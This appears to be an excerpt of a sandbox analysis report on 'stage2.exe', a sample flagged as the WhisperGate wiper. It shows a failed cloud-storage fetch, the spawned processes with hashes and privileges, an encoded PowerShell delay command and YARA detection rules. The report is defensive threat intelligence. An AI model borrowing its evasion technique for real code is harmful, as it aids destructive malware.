                                                       2022-01-17 01:25:24 UTC | 1 | IN | Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 41 63 63 65 73 73 44 65 6e 69 65 64 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 41 6e 6f 6e 79 6d 6f 75 73 20 63 61 6c 6c 65 72 20 64 6f 65 73 20 6e 6f 74 20 68 61 76 65 20 73 74 6f 72 61 67 65 2e 6f 62 6a 65 63 74 73 2e 67 65 74 20 61 63 63 65 73 73 20 74 6f 20 74 68 65 20 47 6f 6f 67 6c 65 20 43 6c 6f 75 64 20 53 74 6f 72 61 67 65 20 6f 62 6a 65 63 74 2e 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                      Data Ascii: <?xml version='1.0' encoding='UTF-8'?><Error><Code>AccessDenied</Code><Message>Access denied.</Message><Details>Anonymous caller does not have storage.objects.get access to the Google Cloud Storage object.</Details></Error>


                                                      Code Manipulations

                                                      Statistics

                                                      Behavior


System Behavior

General

Start time: 02:24:07
Start date: 17/01/2022
Path: C:\Users\user\Desktop\stage2.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\stage2.exe"
Imagebase: 0xea0000
File size: 214944 bytes
MD5 hash: 14C8482F302B5E81E3FA1B18A509289D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: APT_HKTL_Wiper_WhisperGate_Jan22_2, Description: Detects unknown wiper malware, Source: 00000001.00000000.439887170.0000000000EA2000.00000002.00020000.sdmp, Author: Florian Roth
• Rule: APT_HKTL_Wiper_WhisperGate_Jan22_2, Description: Detects unknown wiper malware, Source: 00000001.00000002.480052318.0000000000EA2000.00000002.00020000.sdmp, Author: Florian Roth
• Rule: APT_HKTL_Wiper_WhisperGate_Jan22_2, Description: Detects unknown wiper malware, Source: 00000001.00000000.437666808.0000000000EA2000.00000002.00020000.sdmp, Author: Florian Roth
• Rule: APT_HKTL_Wiper_WhisperGate_Jan22_2, Description: Detects unknown wiper malware, Source: 00000001.00000000.271766492.0000000000EA2000.00000002.00020000.sdmp, Author: Florian Roth
Reputation: low

General

Start time: 02:24:08
Start date: 17/01/2022
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
Imagebase: 0x13a0000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

General

Start time: 02:24:08
Start date: 17/01/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7f20f0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 02:24:44
Start date: 17/01/2022
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
Imagebase: 0x13a0000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

General

Start time: 02:24:44
Start date: 17/01/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7f20f0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 02:25:27
Start date: 17/01/2022
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 2396
Imagebase: 0x10a0000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

Disassembly

Code Analysis
